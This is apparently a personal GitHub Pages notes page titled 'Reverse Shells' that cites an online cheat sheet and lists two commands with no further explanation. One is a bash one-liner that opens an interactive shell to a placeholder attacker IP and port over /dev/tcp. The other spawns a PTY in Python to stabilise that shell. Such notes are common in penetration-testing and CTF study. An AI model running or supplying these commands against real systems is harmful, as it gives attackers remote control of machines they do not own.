narrowtomato.github.io


Project maintained by narrowtomato Hosted on GitHub Pages — Theme by mattgraham

Home

Reverse Shells

Sources

https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells

Shells

bash -i >& /dev/tcp/ATTACKING-IP/PORT 0>&1

Stabilize

python3 -c 'import pty; pty.spawn("/bin/bash")'